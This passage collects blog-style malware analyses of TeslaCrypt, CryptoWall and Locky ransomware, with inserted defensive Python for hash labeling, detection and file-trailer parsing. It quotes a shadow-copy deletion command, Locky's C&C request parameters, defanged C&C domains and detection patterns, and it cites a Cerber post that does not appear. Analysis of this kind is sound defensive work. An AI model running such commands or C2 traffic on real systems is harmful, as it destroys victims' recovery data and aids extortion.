  • File encryption routine

Obfuscation
TeslaCrypt is not above recycling code from older malware families. The initial code is an encrypted copy of a compressed binary. After decrypting it, the malware calls the RtlDecompressBuffer API and writes the decompressed data into its own memory.

Call to RtlDecompressBuffer

The malware also obscures its API calls: instead of the API name, it passes a hash of the name to a function that looks up and returns the API’s address.

The malware passes an API hash to a function that returns the procedure address of the API.

The same code but labeled properly in a disassembler.

File Encryption
TeslaCrypt uses AES encryption and sends part of the key material to its C&C server, so what remains on the victim’s machine is, on its own, insufficient to recover the files.

It will start by checking if the system already has its own recovery key. If not, it will begin generating the necessary encryption keys. These keys will be used for the encryption routine.

Checks if the recovery key already exists and generates it if it doesn’t.

TeslaCrypt will traverse all fixed, remote and removable drives for files with the following extensions:

.3FR .7Z .ACCDB .AI .APK .ARCH00 .ARW .ASSET .AVI .BAK .BAR .BAY .BC6 .BC7 .BIG .BIK .BKF .BKP .BLOB .BSA .CAS .CDR .CER .CFR .CR2 .CRT .CRW .CSS .CSV .D3DBSP .DAS .DAZIP .DB0 .DBA .DBF .DCR .DER .DESC .DMP .DNG .DOC .DOCM .DOCX .DWG .DXG .EPK .EPS .ERF .ESM .FF .FLV .FORGE .FOS .FPK .FSH .GDB .GHO .HKDB .HKX .HPLG .HVPL .IBANK .ICXS .INDD .ITDB .ITL .ITM .IWD .IWI .JPE .JPEG .JPG .JS .KDB .KDC .KF .LAYOUT .LBF .LITEMOD .LITESQL .LRF .LTX .LVL .M2 .M3U .M4A .MAP .MCMETA .MDB .MDBACKUP .MDDATA .MDF .MEF .MENU .MLX .MOV .MP4 .MPQGE .MRWREF .NCF .NRW .NTL .ODB .ODC .ODM .ODP .ODS .ODT .ORF .P12 .P7B .P7C .PAK .PDD .PDF .PEF .PEM .PFX .PKPASS .PNG .PPT .PPTM .PPTX .PSD .PSK .PST .PTX .PY .QDF .QIC .R3D .RAF .RAR .RAW .RB .RE4 .RGSS3A .RIM .ROFL .RTF .RW2 .RWL .SAV .SB .SID .SIDD .SIDN .SIE .SIS .SLM .SNX .SQL .SR2 .SRF .SRW .SUM .SVG .SYNCDB .T12 .T13 .TAX .TIFF .TOR .TXT .UPK .VCF .VDF .VFS0 .VPK .VPP_PC .VTF .W3X .WALLET .WB2 .WMA .WMO .WMV .WPD .WPS .X3F .XF .XLK .XLS .XLSB .XLSM .XLSX .XXX .ZIP .ZTMP

The exceptions are files whose name contains the string “recove” and files located under the following directories:

  • %WINDIR% (C:\Windows)
  • %PROGRAMFILES% (C:\Program Files)
  • %COMMONAPPDATA% (C:\Documents and Settings\All Users\Application Data for Windows XP and C:\ProgramData for Windows Vista and above)
  • %LOCALAPPDATA%\Temporary Internet Files (C:\Documents and Settings\[USERNAME]\Local Settings for Windows XP and C:\Users\[USERNAME]\AppData\Local for Windows 7 and above)

Checking for fixed, removable and remote drives

Once a file passes the extension check, the malware proceeds to encryption. It first checks the file for its own encryption header; if the file is not yet encrypted, it encrypts it.

Encrypted files’ headers contain data that includes – but isn’t limited to – the global recovery key, the global public key, the original file size and the encrypted data itself.

Sample of an encrypted file

C&C Servers
The malware tries to connect to one of the following domains:

  • hxxp://naturstein-schubert.de
  • hxxp://csskol.org/wp-content
  • hxxp://casasembargada.com
  • hxxp://mahmutersan.com.tr
  • hxxp://forms.net.in
  • hxxp://kknk-shop.dev.onnetdigital.com

If it manages to connect to a server, it then sends a POST request using encoded data. The data it will send includes the following:

  • The shared key for the encryption
  • Bitcoin address
  • OS version
  • TeslaCrypt version
  • Unique ID for the infected system

HttpSendRequest with the encrypted data

Other Details
To ensure only one instance of the malware runs, it creates a mutex named “8_8_8_8”.

CreateMutex function

It creates an auto start registry entry to ensure execution every startup.

Autostart registry

It also sets the EnableLinkedConnections policy value in the registry. That setting makes network drives mapped under the user’s standard (filtered) token visible to processes running under the elevated token as well, so the malware can reach mapped shares whichever integrity level it runs at.

EnableLinkedConnections registry value

Interestingly enough, the gang behind TeslaCrypt has apparently had a change of heart and publicly shared their master decryption key. Before they shut down, the now-defunct payment site demanded a minimum of $500 in bitcoin.

TeslaCrypt payment page

Advanced threat defense products like those used in this analysis help avoid ransomware infection by catching the emerging threat before it can do any damage. You have two great lines of defense: the first is email, the next is your network.

Advanced email defense solutions like ThreatSecure Email are designed to catch malware that evades traditional defenses. It’s a great tool to help stop attacks by detecting phishing links and exploits that deliver ransomware. That can stop TeslaCrypt from encrypting and taking the data from you.

The next stop is bolstering your network. Adding an advanced defense solution that identifies and correlates discovered threats with anomalous network activity is an invaluable tool to guard your data. ThreatTrack’s ThreatSecure Network, for instance, provides end-to-end network visibility and real-time detection to catch traffic hitting known malicious IPs associated with ransomware distribution and C&C.

 

The post A Close Look at TeslaCrypt 3.0 Ransomware appeared first on ThreatTrack Security Labs Blog.

The Day the Earth Stood Still for CryptoWall

It has been the norm in the cybersecurity industry to be intrigued and, at the same time, infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It has been trickling into the wild since early 2009, but CryptoWall redefined what ransomware means and took it to the next level. Early ransomware used file-sharing sites to upload infected files disguised as ordinary files that anyone could download. Once downloaded and run, it would work through the user’s machine, encrypting data or locking the machine. So how did CryptoWall evade our traditional defender, antivirus? We’ll break down just how CryptoWall did it:

ACT I: Setting the Stage

Email is the most common communication tool in any business today. CryptoWall’s authors have been scraping the Internet for published company email addresses (usually available via marketing sites) to use as the entry point of the attack. These harvested addresses are then blasted with phishing emails, crafted so the recipient believes the message is important and must be read carefully. They usually contain a link to a direct download, or an attachment, of CryptoWall, unbeknownst to the user. The encryption starts when the user clicks.

Here is the sample of a ransomware-laced email disguised as a booking.com email:

Booking.com email example

ACT II: The Latest CryptoWall 4.0 Disassembled

CryptoWall 4.0

MD5: e73806e3f41f61e7c7a364625cd58f65

On initial infection, the sample resolves the addresses of all the API functions it will call later. It does this by means of a list of hashes, one per API name, so the malware needs neither an import table nor API names stored as plain strings.
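Both this CryptoWall hash table and the TeslaCrypt hash-to-address resolver described earlier hide API names behind numeric hashes. The usual way to label such constants in a disassembly is to precompute the hash of every export from clean system DLLs and look the constants up. The following is an added example, not code from either post: neither post names the hash algorithm, so ROR13 (the additive rotate-right-13 hash familiar from Metasploit’s block_api shellcode) stands in for it and must be replaced with the routine recovered from the sample; the export list is limited to the APIs the posts mention.

```python
"""Resolve API-name hashes back to names, the way an analyst labels a
hashed-import resolver in a disassembly.

Added example, not code from the ThreatTrack posts.  Neither post names the
hash algorithm used by TeslaCrypt or CryptoWall; ROR13 is used here only as a
stand-in.  Replace ror13() with the routine recovered from the sample."""

from typing import Callable, Dict, Iterable, Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & MASK32


def ror13(name: str) -> int:
    """Classic additive ROR13 hash of an ASCII export name (assumed algorithm)."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & MASK32
    return h


# Export names the posts show the samples resolving.  In practice you would
# feed every export of kernel32/ntdll/advapi32/wininet from a clean system.
KNOWN_EXPORTS = [
    "CryptAcquireContextA", "CryptCreateHash", "CryptHashData",
    "CryptGetHashParam", "RtlDecompressBuffer", "ZwCreateSection",
    "ZwMapViewOfSection", "ZwAllocateVirtualMemory", "ZwWriteVirtualMemory",
    "ZwProtectVirtualMemory", "ZwQueueApcThread", "ZwResumeThread",
    "HttpSendRequestA", "InternetReadFile",
]


def build_hash_table(names: Iterable[str],
                     hasher: Callable[[str], int] = ror13) -> Dict[int, str]:
    """Precompute hash -> export name so unknown constants can be labeled."""
    table: Dict[int, str] = {}
    for name in names:
        h = hasher(name)
        if h in table and table[h] != name:
            raise ValueError(f"collision: {name} vs {table[h]} -> {h:#010x}")
        table[h] = name
    return table


def resolve(hash_value: int, table: Dict[int, str]) -> Optional[str]:
    """Return the export name behind a hash, or None if it is not in the table."""
    return table.get(hash_value & MASK32)


def label_constants(constants: Iterable[int], table: Dict[int, str]) -> Dict[int, str]:
    """Label a list of immediates copied from the sample's hash table."""
    return {c: (resolve(c, table) or "<unknown>") for c in constants}


if __name__ == "__main__":
    table = build_hash_table(KNOWN_EXPORTS)
    # Constructed input: the constants you would copy out of the sample's table.
    seen = [ror13("CryptHashData"), ror13("ZwQueueApcThread"), 0xDEADBEEF]
    for const, name in label_constants(seen, table).items():
        print(f"{const:#010x}  {name}")
```

Swapping in the real algorithm is a matter of replacing `ror13` with whatever the resolver stub computes (rotation amount, case folding of the name, whether the DLL name is mixed in) and regenerating the table.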

Next, the malware gathers the following system information:

  • ComputerName
  • UserName
  • SystemDrive serial number
  • CPU INFO (using PROCESSOR_IDENTIFIER)
  • CPU level/family (using PROCESSOR_LEVEL)
  • Revision Number of CPU (using PROCESSOR_REVISION)
  • OS Major version
  • OS Minor version
  • IsWow64
  • Keyboard Layout

Among the loaded modules are DLLs belonging to the Windows CryptoAPI (cryptsp.dll) and the Microsoft Enhanced Cryptographic Provider (rsaenh.dll), which suggests the malware is going to perform cryptographic operations.

It derives an MD5 hash identifying the victim’s PC from the system information above, using the following API sequence:

  • CryptAcquireContext
  • CryptCreateHash (Algorithm ID = CALG_MD5, 0x00008003; key handle 0, i.e. a non-keyed algorithm)
  • CryptHashData
  • CryptGetHashParam

The malware will inject code in a newly spawned child process – Explorer.exe – using the following APIs:

  • ZwCreateSection
  • ZwMapViewOfSection
  • ZwAllocateVirtualMemory
  • ZwWriteVirtualMemory
  • ZwProtectVirtualMemory
  • ZwQueueApcThread
  • ZwResumeThread

It creates a copy of the original file in the %APPDATA% folder and adds an AutoStart registry entry.

The injected code is responsible for disabling system protection, deleting all system shadow copies, and injecting code into another newly spawned process, svchost.exe.

Deleting shadow copies, allowing the malware to disable file recovery services.

AV limitation: emulation timeout

Disable system restore

Execution continues in the svchost.exe process, which formulates the commands used to communicate with the C&C server. It again gathers the system information above and generates the MD5 hash of the victim’s PC that is used in the C&C communication.

Some of the C&C servers:

C&C servers

Network communication is over HTTP with an encrypted payload. The malware tries to reach one of the following I2P proxies through I2P URLs; once it succeeds, it sends a POST request carrying the encoded request string.

CryptoWall stores the following information inside a configuration file:

  • Received public key binary data
  • TXT
  • HTML
  • PNG

The last three files will be written in each folder of the victim’s system after the file-encryption process.

Normal file behavior

Payload after multiple layers of encryption

ACT III: “It’s like I left my keys inside my car”

If you’ve ever locked your keys inside your car, you know how irritating it feels. You know where they are, but you can’t do anything about it and you have to pay a locksmith to open it for you – or get real crafty with a wire coat hanger. Ransomware is a lot like that: Your most precious information and data has been held for ransom, and there is a chance that it could be released to the public – and you have no way to stop it.

HELP_YOUR_FILES.HTML

Once CryptoWall has finished encrypting your files, it will launch the ransom notes that explain what happened and how to purchase the decrypter.

For an even deeper dive into CryptoWall, check out our analysis of CryptoWall 4 here.

ACT IV: Finding Solutions to Guard Against Ransomware

The bright spot in all this is that, if you can see the trend of the infection, there are lots of points where we can actually stop CryptoWall.

The first stop is email. Advanced email defense solutions designed to catch malware that evades traditional defenses are a great tool for stopping attacks by detecting the phishing links and exploits that deliver ransomware, before CryptoWall can encrypt and take your data.

The next defense is bolstering your network. Adding an advanced defense solution that identifies and correlates discovered threats with anomalous network activity is an invaluable tool to guard your data. ThreatTrack’s ThreatSecure Network, for instance, provides end-to-end network visibility and real-time detection to catch traffic hitting known malicious IPs associated with ransomware distribution and C&C.

The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

Understanding the Latest Version of Locky Ransomware

It is one of the most prevalent spam-delivered malware families in the wild today: Locky ransomware. The Locky authors started their campaign last year but did not become very active until January 2016, and they haven’t slowed down since.

Locky e-mails usually arrive with an attached zip archive which, once extracted, contains a document or a JavaScript file. The Locky sample we discovered used a JavaScript that downloads and runs an executable. That executable, the latest version of Locky, is the focal point of this analysis.

Locky spam email

The spam email sent by the malware authors.


Basic Infection Flow and File Hashes:

  • 1582A0B6A04854C39F8392B061C52A7A – The .zip attachment
  • 59D2E5827F0EFFE7569B2DAE633AFD1F – The JavaScript extracted from the .zip
  • F79C950FA3EFC3BB29A4F15AE05448F2 – The Locky executable downloaded by the JavaScript

Basic infection and file hashes

Indications of Compromise:

It is fairly easy to find out if a machine is infected by Locky. The image below shows the desktop background of a compromised Windows XP machine.

Desktop of a Locky-infected computer
Files encrypted by the ransomware are given the extension “.locky”, and their names start with the personal ID of the infected user, in this case “8B74B4AA40D51F4A”, which is derived from an MD5 hash as described below. A text file named “_HELP_instructions.txt” contains the same message displayed as the desktop background.

Locky files

Locky creates an encrypted user-specific registry key under HKCU\Software; the registry values are discussed later in this post. The key created was “8W21gQe9WZ3tc”.

Encrypted user-specific key
Payment Instructions

The user is instructed to install the Tor Browser to access the payment page shown below. The victim must have a bitcoin wallet and send 1.5 bitcoin to the specified address.

Payment page for Locky ransomware

A Look at the JavaScript 59D2E5827F0EFFE7569B2DAE633AFD1F

The JavaScript is straightforward. The following lines are visible once opened in a text editor:

JavaScript 1

The JavaScript downloads the payload with a GET request to http://goldish[dot]dk/o2pds, saves it in %Temp% and executes it. The executable will not run properly unless it is located in a %Temp% folder.

In-Depth Analysis of the Executable F79C950FA3EFC3BB29A4F15AE05448F2

Just like other malware families such as Upatre, Dridex and Crypto, the real Locky executable is wrapped in encryption routines to avoid signature-based detection. The last step of the unwrapping process decompresses the executable with the RtlDecompressBuffer API, the same method we have seen in the Upatre and Necurs rootkit downloaders.

RtlDecompressBuffer API
The MD5 of the unwrapped Locky executable analyzed is F35D01F835FC637E0D9E66CD7E571C06.

The executable first decrypts the following CnC server IP addresses.

CnC Server IP addresses
The executable retrieves the Windows directory with GetWindowsDirectoryA, then passes it to GetVolumeNameForVolumeMountPointA, which returns the volume GUID path of the volume holding the Windows folder.

Windows directory

This volume GUID is the initial basis for the unique ID Locky assigns to the user.

First, the executable feeds the GUID to the API CryptHashData.

API CryptHashData

To obtain the unique machine ID, “8B74B4AA40D51F4A”, the executable calls CryptGetHashParam to read back the hash of the GUID and keeps its first 8 bytes, visible at the start of the hex dump.

API CryptGetHashParam
This unique ID also determines the name of the registry key this version of Locky creates: the ID is run through a checksum-to-string routine implemented in the executable, and the resulting string is used as the key name.

For this new version, that set of instructions explains why the registry key is “8W21gQe9WZ3tc” instead of “Locky”, which older versions used.

New registry key

CnC Communication

The Locky executable sends a POST request to “http://<IP/Domain>/submit.php” using the following commands and parameters (remove the <> when reading):

  Command              Parameters
  &act=getkey&affid=   id=<>, &lang=<>, &corp=<>, &serv=<>, &os=<>, &sp=<>, &x64=<>
  &act=gettext&lang=   id=<>
  &act=stats&path=     id=<>, &encrypted=<>, &failed=<>, &length=<>

An example of the parameters for the &act=getkey&affid= command, in plaintext form:

id=8B74B4AA40D51F4A&act=getkey&affid=1&lang=en&corp=0&serv=0&os=Windows+XP&sp=3&x64=0

These commands will be sent to the CnC server in encrypted form via the API HttpSendRequestA. The executable also receives an encrypted reply via the API InternetReadFile.

CnC server commands
After sending the getkey command, the executable decrypts the reply it receives from the CnC, which contains the public RSA key. The image below shows part of the decryption routine; the public RSA key is visible in the ASCII dump.

Decryption routine

Saving The Public Key in the User’s Machine

The executable encrypts the public RSA key and stores it as a binary value under its HKCU\Software registry key. The value name, “270CwQa9XuPIc7”, is produced by the same checksum-to-string conversion used for the key name.

Encrypting public RSA key

A Message to the User

It then sends the CnC command “&act=gettext&lang=”, which retrieves the Locky ransom message, the same text as the desktop background image.

Locky ransomware message
Once again, just like the public RSA key, this message is encrypted and stored as a binary value in the HKCU\Software registry key created by the executable, under the value name “7CaY397p5R”.

Gathering the Drives, Network Resources and Files to Encrypt

Network Shares and Resources:

The executable uses a routine built on the APIs WNetOpenEnumW, WNetEnumResourceW, WNetAddConnection2 and WNetCloseEnum to walk three types of network resources:

  • #define RESOURCE_CONNECTED 1
  • #define RESOURCE_GLOBALNET 2
  • #define RESOURCE_REMEMBERED 3

The usage of NetResource Parsing Routine for different types of resources:

NetResource Parsing Routine

After a shared folder was enabled on the analysis machine, the image shows the executable connecting to the share so it can encrypt its files later on.

Encrypting files in the shared folder

The executable then uses the APIs GetLogicalDrives and GetDriveTypeW to gather the drives to encrypt. In this case it found the “C:\” drive.

Encrypting the C:\ drive

The last step is to spawn the thread that will encrypt the files per folder in the drives and resources that were gathered.

Final step in the Locky ransomware process
Deleting the Shadow Copies to Prevent Data Restoration

The next step for the executable is to delete the shadow copies by running this command:

“vssadmin.exe Delete Shadows /All /Quiet”

Other ransomware families, including Crypto, have used this same command.
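The process-level chain described in these posts (an Office document spawning a script host that runs a VBS from %appdata% and a .TMP in %appdata% being executed, as in the Cerber post above; vssadmin deleting shadow copies, as here and in the CryptoWall post) can be matched over process-creation telemetry. The following is an added example, not code from the original posts. The event format and the sample events are constructed here and assume a Sysmon/EDR-style process-create feed with parent image, image and command line.

```python
"""Match the process-level behaviours described in the Cerber, CryptoWall and
Locky write-ups against process-creation events.

Added example, not code from the ThreatTrack posts.  Event fields
(parent_image, image, command_line) are assumed to come from a Sysmon/EDR
process-create feed; SAMPLE_EVENTS below is constructed, not real telemetry."""

import re
import shlex
from typing import Dict, Iterable, List

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
VSSADMIN = {"vssadmin.exe", "vssadmin"}
APPDATA_RE = re.compile(r"\\appdata\\(roaming|local)\\", re.IGNORECASE)


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(command_line: str) -> List[str]:
    """Split a Windows command line keeping quoted paths intact."""
    try:
        return [t.strip('"') for t in shlex.split(command_line, posix=False)]
    except ValueError:
        return command_line.split()


def is_shadow_copy_deletion(command_line: str) -> bool:
    """vssadmin Delete Shadows /All /Quiet, in any casing, quoting or path form."""
    toks = [t.lower() for t in _tokens(command_line)]
    if not toks or _basename(toks[0]) not in VSSADMIN:
        return False
    return "delete" in toks and "shadows" in toks


def is_office_script_drop(parent_image: str, image: str, command_line: str) -> bool:
    """An Office process spawning a script host that runs a .vbs from %APPDATA%."""
    if _basename(parent_image) not in OFFICE_HOSTS or _basename(image) not in SCRIPT_HOSTS:
        return False
    return bool(APPDATA_RE.search(command_line)) and ".vbs" in command_line.lower()


def is_appdata_tmp_execution(image: str) -> bool:
    """A .tmp file under %APPDATA% started as a process (Cerber's cryptor stage)."""
    return bool(APPDATA_RE.search(image)) and image.lower().endswith(".tmp")


def classify(event: Dict[str, str]) -> List[str]:
    """Every behaviour name the event matches; an empty list means nothing fired."""
    hits: List[str] = []
    if is_office_script_drop(event["parent_image"], event["image"], event["command_line"]):
        hits.append("office_spawns_appdata_vbs")
    if is_appdata_tmp_execution(event["image"]):
        hits.append("appdata_tmp_executed")
    if is_shadow_copy_deletion(event["command_line"]):
        hits.append("shadow_copy_deletion")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """event id -> matched behaviours, for the events that matched anything."""
    findings: Dict[str, List[str]] = {}
    for event in events:
        hits = classify(event)
        if hits:
            findings[event["id"]] = hits
    return findings


# Constructed sample feed mirroring the chain in the posts (not captured telemetry).
SAMPLE_EVENTS = [
    {"id": "1", "parent_image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\bob\AppData\Roaming\drop.vbs"'},
    {"id": "2", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\bob\AppData\Roaming\9f3a.tmp",
     "command_line": r"C:\Users\bob\AppData\Roaming\9f3a.tmp"},
    {"id": "3", "parent_image": r"C:\Users\bob\AppData\Roaming\9f3a.tmp",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": r'"C:\Windows\System32\VSSADMIN.EXE" Delete Shadows /All /Quiet'},
    {"id": "4", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": r"vssadmin.exe list shadows"},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(hits))
```

Event 4 (a benign `vssadmin list shadows`) produces no finding, which is the point of tokenising the command line rather than substring-matching on “vssadmin”: backup tooling lists shadows routinely, while an unattended `delete shadows` from a process tree rooted in an Office document is what the three posts have in common.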

The File Encryption Process – the Thread Spawned

The first step in this phase is to parse the directories and files of the machine. The executable allocates a memory space as a structured reference for the files to be encrypted.

White List Check

While parsing the machine’s directories, it checks each file’s path against the following set of whitelist strings. Files whose path contains one of these strings are not encrypted.

  • @_HELP_instructions.bmp, _HELP_instructions.txt, _Locky_recover_instructions.bmp, _Locky_recover_instructions.txt, tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, Windows

Black List Check

The Locky executable also checks the extension of each candidate file. If the file has one of the following extensions, it is encrypted.

  • .001, .002, .003, .004, .005, .006, .007, .008, .009, .010, .011, .123, .3dm, .3ds, .3g2, .3gp, .602, .7z, .ARC, .CSV, .DOC, .DOT, .MYD, .MYI, .NEF, .PAQ, .PPT, .RTF, .SQLITE3, .SQLITEDB, .XLS, .aes, .asc, .asf, .asm, .asp, .avi, .bak, .bat, .bmp, .brd, .cgm, .class, .cmd, .cpp, .crt, .cs, .csr, .db, .dbf, .dch, .dif, .dip, .djv, .djvu, .docb, .docm, .docx, .dotm, .dotx, .fla, .flv, .frm, .gif, .gpg, .gz, .hwp, .ibd, .jar, .java, .jpeg, .jpg, .js, .key, .lay, .lay6, .ldf, .m3u, .m4u, .max, .mdb, .mdf, .mid, .mkv, .mml, .mov, .mp3, .mp4, .mpeg, .mpg, .ms11, .ms11 (Security copy), .n64, .odb, .odg, .odp, .ods, .odt, .onetoc2, .otg, .otp, .ots, .ott, .p12, .pas, .pdf, .pem, .php, .pl, .png, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .pptm, .pptx, .psd, .pst, .qcow2, .rar, .raw, .rb, .sch, .sh, .sldm, .sldx, .slk, .sql, .stc, .std, .sti, .stw, .svg, .swf, .sxc, .sxd, .sxi, .sxm, .sxw, .tar, .tar.bz2, .tbk, .tgz, .tif, .tiff, .txt, .uop, .uot, .vb, .vbs, .vdi, .vmdk, .vmx, .vob, .wav, .wb2, .wk1, .wks, .wma, .wmv, .xlc, .xlm, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .zip, wallet.dat (filename specific)
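Both this Locky whitelist/extension check and the TeslaCrypt rules described earlier (skip anything containing “recove” or living under %WINDIR%, %PROGRAMFILES%, %COMMONAPPDATA% or Temporary Internet Files, then match the extension list) amount to the same target-selection logic. The following added example reproduces that logic to predict which paths each sample would touch, which is useful when deciding where canary files or backups should live. It is not the malware’s own code: the extension lists are abbreviated to a representative subset of those above, the TeslaCrypt directory exclusions are written as Vista-and-later paths, and case-insensitive, component-wise path matching is an assumption about how the samples compare strings.

```python
"""Predict which paths TeslaCrypt 3.0 and this Locky build would encrypt, by
reproducing the whitelist / extension checks described in the posts.

Added example, not the malware's own code.  Extension lists are abbreviated to
a representative subset; case-insensitive, component-wise matching of the
whitelist strings is an assumption about how the samples compare strings."""

from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import FrozenSet, Iterable, List


@dataclass(frozen=True)
class TargetRules:
    name: str
    extensions: FrozenSet[str]                          # lower-case, with leading dot
    excluded_components: FrozenSet[str] = frozenset()   # path components that exempt a file
    excluded_substrings: FrozenSet[str] = frozenset()   # substrings anywhere in the lower-cased path
    extra_filenames: FrozenSet[str] = frozenset()       # exact names hit regardless of extension


def would_encrypt(path: str, rules: TargetRules) -> bool:
    """True if `path` survives the exclusions and matches the extension list."""
    p = PureWindowsPath(path)
    if {part.lower() for part in p.parts} & rules.excluded_components:
        return False
    lowered = str(p).lower()
    if any(s in lowered for s in rules.excluded_substrings):
        return False
    if p.name.lower() in rules.extra_filenames:
        return True
    # Try the two-part suffix first so ".tar.bz2" is recognised, then the plain one.
    return ("".join(p.suffixes[-2:]).lower() in rules.extensions
            or p.suffix.lower() in rules.extensions)


def predict(paths: Iterable[str], rules: TargetRules) -> List[str]:
    """Subset of `paths` the sample would encrypt, in input order."""
    return [path for path in paths if would_encrypt(path, rules)]


TESLACRYPT = TargetRules(
    name="TeslaCrypt 3.0",
    extensions=frozenset({
        ".7z", ".accdb", ".ai", ".avi", ".bak", ".cer", ".crt", ".csv", ".doc", ".docx",
        ".jpeg", ".jpg", ".mdb", ".pdf", ".pem", ".pfx", ".png", ".ppt", ".pptx", ".psd",
        ".pst", ".rar", ".sql", ".txt", ".wallet", ".xls", ".xlsx", ".zip"}),
    # Post: skip files containing "recove" and files under %WINDIR%, %PROGRAMFILES%,
    # %COMMONAPPDATA% and Temporary Internet Files (Vista+ paths assumed here).
    excluded_substrings=frozenset({"recove", "c:\\windows\\", "c:\\program files\\",
                                   "c:\\programdata\\", "\\temporary internet files\\"}),
)

LOCKY = TargetRules(
    name="Locky",
    extensions=frozenset({
        ".7z", ".avi", ".bak", ".csv", ".doc", ".docx", ".jpeg", ".jpg", ".mdb", ".pdf",
        ".pem", ".png", ".ppt", ".pptx", ".psd", ".pst", ".rar", ".sql", ".tar.bz2", ".tgz",
        ".txt", ".vmdk", ".xls", ".xlsx", ".zip"}),
    excluded_components=frozenset({
        "_help_instructions.bmp", "_help_instructions.txt", "_locky_recover_instructions.bmp",
        "_locky_recover_instructions.txt", "tmp", "winnt", "application data", "appdata",
        "program files (x86)", "program files", "temp", "thumbs.db", "$recycle.bin",
        "system volume information", "boot", "windows"}),
    extra_filenames=frozenset({"wallet.dat"}),
)

# Constructed sample paths, not from a real host.
SAMPLE_PATHS = [
    r"C:\Users\bob\Documents\budget.xlsx",
    r"C:\Windows\System32\drivers\etc\hosts.txt",
    r"C:\Users\bob\Documents\+REcovER+abcd+.txt",
    r"D:\backups\wallet.dat",
    r"C:\Users\bob\Downloads\archive.tar.bz2",
    r"\\fileserver\share\photos\IMG_0001.jpg",
]

if __name__ == "__main__":
    for rules in (TESLACRYPT, LOCKY):
        print(rules.name)
        for path in predict(SAMPLE_PATHS, rules):
            print("  would encrypt:", path)
```

The differences are instructive: TeslaCrypt spares its own “+REcovER+” notes via the “recove” substring while Locky would happily encrypt a .txt file with that name, and Locky targets wallet.dat by name where TeslaCrypt only knows a .wallet extension.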

API and Function-Level Overview of the File Encryption Process:

Locky’s claim that it uses AES and RSA is essentially true. It used CryptoAPI functions during the encryption process, including CryptGenRandom and CryptEncrypt, and two of its functions use the AES-NI instructions AESENC and AESKEYGENASSIST.

API overview

Dissecting the Last 0x344 Bytes of an Encrypted Locky File

In the image below, the last 0x344 bytes are written at the end of the file. The first four bytes are hard-coded by the executable; we believe they identify, for the Locky authors, the version that encrypted the user’s files.

Hard-coded 0x8956FE93

Writing to the file

The next 0x10 bytes are the user’s unique ID. The next 0x100 bytes are the output of the CryptEncrypt API, and the final 0x230 bytes come from the AESENC routine mentioned in the encryption flow above.
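The trailer layout described above (4-byte marker, 0x10-byte ID, 0x100 bytes of CryptEncrypt output, 0x230 bytes from the AES routine, 0x344 bytes in total) is enough to write a parser that identifies Locky-encrypted files and pulls the victim ID out of them for triage. The following is an added example, not code from the original post. It assumes the marker is stored as a little-endian DWORD and that the ID is 16 ASCII hex characters; the test vector it builds is constructed, not a real encrypted file.

```python
"""Parse the 0x344-byte trailer Locky appends to every encrypted file.

Added example, not from the original post.  Layout follows the post: 4-byte
marker 0x8956FE93, 0x10 bytes of victim ID, 0x100 bytes of CryptEncrypt (RSA)
output, 0x230 bytes produced by the AES routine.  Assumptions: the marker is
stored little-endian and the ID is 16 ASCII hex characters."""

import os
import re
import struct
from dataclasses import dataclass
from typing import Optional

LOCKY_MARKER = 0x8956FE93
ID_LEN, RSA_BLOB_LEN, AES_BLOB_LEN = 0x10, 0x100, 0x230
FOOTER_LEN = 4 + ID_LEN + RSA_BLOB_LEN + AES_BLOB_LEN   # == 0x344, as the post states
HEX_ID_RE = re.compile(r"[0-9A-Fa-f]{16}")


@dataclass(frozen=True)
class LockyFooter:
    victim_id: str
    rsa_blob: bytes     # CryptEncrypt output: key material wrapped with the victim's RSA key
    aes_blob: bytes     # output of the AES-NI routine
    original_size: int  # file length minus the trailer


def parse_locky_footer(data: bytes) -> Optional[LockyFooter]:
    """Return the parsed trailer, or None if `data` does not look Locky-encrypted."""
    if len(data) < FOOTER_LEN:
        return None
    footer = data[-FOOTER_LEN:]
    (marker,) = struct.unpack("<I", footer[:4])
    if marker != LOCKY_MARKER:
        return None
    raw_id = footer[4:4 + ID_LEN]
    try:
        victim_id = raw_id.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not HEX_ID_RE.fullmatch(victim_id):
        return None
    rsa_start = 4 + ID_LEN
    aes_start = rsa_start + RSA_BLOB_LEN
    return LockyFooter(
        victim_id=victim_id.upper(),
        rsa_blob=footer[rsa_start:aes_start],
        aes_blob=footer[aes_start:],
        original_size=len(data) - FOOTER_LEN,
    )


def build_sample(victim_id: str, body_len: int = 1000) -> bytes:
    """Constructed test vector: random 'ciphertext' body followed by a well-formed
    trailer.  This is NOT produced by Locky; it only exercises the parser."""
    body = os.urandom(body_len)
    footer = (struct.pack("<I", LOCKY_MARKER) + victim_id.encode("ascii")
              + os.urandom(RSA_BLOB_LEN) + os.urandom(AES_BLOB_LEN))
    return body + footer


if __name__ == "__main__":
    blob = build_sample("8B74B4AA40D51F4A")
    info = parse_locky_footer(blob)
    print(info.victim_id, info.original_size, len(info.rsa_blob), len(info.aes_blob))
```

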